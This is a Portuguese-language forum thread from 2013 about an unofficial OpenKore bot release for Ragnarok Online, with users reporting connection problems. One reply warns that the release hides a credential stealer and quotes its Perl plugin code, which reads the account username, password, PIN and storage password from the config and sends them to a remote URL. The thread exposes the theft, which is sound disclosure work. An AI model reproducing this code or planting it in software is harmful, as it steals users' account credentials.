andersonmellooo 0 Postado 13 de Fevereiro 2013 Compartilhar Postado 13 de Fevereiro 2013 Openkore Atualização Semanal 20/02/13 conteúdo removido! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
pedrobeltran 0 Postado 13 de Fevereiro 2013 Compartilhar Postado 13 de Fevereiro 2013 cara, está acontecendo um problema... quando eu logo no poseidon server, aparece que o numero de personagens chegou ao limite. e não dá pra entrar em nenhum dos aprendizes. Poderia me ajudar? Grato. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
KAWA125 0 Postado 13 de Fevereiro 2013 Compartilhar Postado 13 de Fevereiro 2013 Fechando conexão com o Servidor de Personagens Desconectando-se (200.229.50.21:6000)...desconectado Conectando-se ao Servidor de Mapas... Conectando-se (200.229.50.77:5000)... conectado Tempo esgotado no Servidor de Mapas, conectando-se ao Servidor de Contas... Outro erro estranho no Poseidon [PoseidonServer]-> Bot Client Disconnecter : 6 Alguém ajuda ai!! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
andersonmellooo 0 Postado 13 de Fevereiro 2013 Autor Compartilhar Postado 13 de Fevereiro 2013 editado ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
andersonmellooo 0 Postado 14 de Fevereiro 2013 Autor Compartilhar Postado 14 de Fevereiro 2013 up! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
giggioxxx 0 Postado 15 de Fevereiro 2013 Compartilhar Postado 15 de Fevereiro 2013 aaaah poe logo . meu openkore nao ta funcionando !!!! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
andersonmellooo 0 Postado 20 de Fevereiro 2013 Autor Compartilhar Postado 20 de Fevereiro 2013 Atualizado 20/02/13 ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
hjean_ipo 0 Postado 21 de Fevereiro 2013 Compartilhar Postado 21 de Fevereiro 2013 Funcionando aqui com essa att.... andersonmellooo se tu me hackear eu te caço rsrsrs ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
djhey 0 Postado 21 de Fevereiro 2013 Compartilhar Postado 21 de Fevereiro 2013 não da pra rodar na maquina virtual! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
digo159 0 Postado 21 de Fevereiro 2013 Compartilhar Postado 21 de Fevereiro 2013 Olá! Pessoal passando só pra avisar que está com KL! Cuidado! Como sempre falo, baixe com confiança o que o Saruesly Posta... Aguarde! Nem que demore mais um pouco! O nosso querido Criador do post aqui, fez uma conta fake a um tempo, acusando Saru no post dele, coisa que eu refutei imediatamente. Eis aqui o código malicioso: use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $master = $config{'master'}; $master =~ s/#/:/; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $loginPin = $config{'loginPinCode'}; $loginPin =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get(" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se $usuario $senha $loginPin $kafra"); Para quem não acredita, baixe, vá até a pasta plugins. e abra no editor (de preferencia o NotePad++) o arquivo "Setpin" Tópico denúnciado. Até mais! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
j0nstrike 0 Postado 21 de Fevereiro 2013 Compartilhar Postado 21 de Fevereiro 2013 só uma pequena duvidinha, pq seu link nao passa pelo scan com o avast,avira, microsoft essentials, avg, etc ? só baixo esse bot se postar scan por esses ant virus . os ant virus q tu passou são fracos ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
jaugusto1997 0 Postado 21 de Fevereiro 2013 Compartilhar Postado 21 de Fevereiro 2013 openkore com kl, sugiro esperarem o oficial! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
andersonmellooo 0 Postado 21 de Fevereiro 2013 Autor Compartilhar Postado 21 de Fevereiro 2013 basta apagar o setpin.pl ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
jaugusto1997 0 Postado 21 de Fevereiro 2013 Compartilhar Postado 21 de Fevereiro 2013 bom ate onde eu sei sao proibidas openkores prontas aqui a nao ser a oficial, de qualquer forma recomendo que baixem a oficial pra não ter problemas ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
digo159 0 Postado 21 de Fevereiro 2013 Compartilhar Postado 21 de Fevereiro 2013 basta apagar o setpin.pl Olá! O fato, andersonmellooo não é de "apenas apagar" o arquivo, e sim que tu o postou na área, AFIRMANDO que o mesmo estava limpo. Isso, ao mer ver, já desmerece o trabalho, um ato de má fé com os usuários do fórum. Fora que, essas mesmas linhas, foram utilizadas, por outro usuário, para acusar o Saruesly *-*, dizendo que estavam no arquivo do dia 02, coisa que eu disse que não era possível, pois eu sempre guardo as atualizações dos openkores que eu baixo, para casos de "Edits", para a pessoa querer tirar o ** da reta. Até mais! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados